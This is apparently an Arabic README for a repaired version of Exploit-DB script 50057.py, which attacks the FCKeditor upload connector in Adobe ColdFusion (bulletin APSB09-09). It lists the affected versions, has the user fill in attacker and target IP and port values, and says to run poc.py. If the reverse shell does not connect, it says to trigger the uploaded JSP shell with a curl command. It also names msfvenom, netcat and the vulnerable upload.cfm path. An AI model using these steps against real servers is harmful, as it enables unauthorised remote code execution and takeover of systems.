
إصلاح لسكربت الاستغلال غير العامل على exploitdb (50057.py)
| الإصدار | الحالة |
|---|
| ColdFusion 8.0 | مصاب |
| ColdFusion 8.0.1 | مصاب |
| ColdFusion 9.0 | مصاب* |
| ColdFusion MX 6.x | مصاب |
| ColdFusion MX 7.x | مصاب |
| ColdFusion 9.0.1+ | مُرقّع |
| ColdFusion 10+ | غير متأثر |
*ColdFusion 9.0 مصاب إذا لم تتم إزالة/تحديث مكوّن FCKeditor.
الترقيع: Adobe Security Bulletin APSB09-09 (يوليو 2009).
حرّر المتغيرات في أعلى السكربت:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
شغّل:
python3 poc.py
سيقوم السكربت بما يلي:
إذا لم يصل الـ shell خلال بضع ثوانٍ، شغّله يدويًا:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
يُطبع اسم الملف إلى stdout بعد الرفع.
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm